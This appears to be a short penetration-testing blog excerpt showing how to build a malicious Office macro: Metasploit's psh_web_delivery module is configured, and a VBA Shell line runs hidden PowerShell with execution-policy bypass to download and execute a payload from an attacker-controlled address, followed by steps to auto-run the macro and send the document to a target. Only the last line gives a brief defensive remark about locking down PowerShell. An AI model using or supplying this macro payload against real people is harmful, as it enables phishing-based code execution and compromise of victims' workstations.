msf > use exploit/windows/misc/psh_web_delivery
msf exploit(psh_web_delivery) > set SRVHOST 172.16.5.11
msf exploit(psh_web_delivery) > set URIPATH boom
msf exploit(psh_web_delivery) > exploit
Call Shell("powershell.exe -w hidden -nop -ep bypass -c ""IEX ((new-object net.webclient).downloadstring('http://172.16.5.11:8080/boom'))""", 1)
*Note: If you are using a Excel document, your macro will need to be named Auto_Open()
Save the document as a macro-enabled file.
Send to target, and upon opening....
Meanwhile back at the bat cave...
This highlights yet another reason for defenders to lock down Powershell on workstations as much as possible.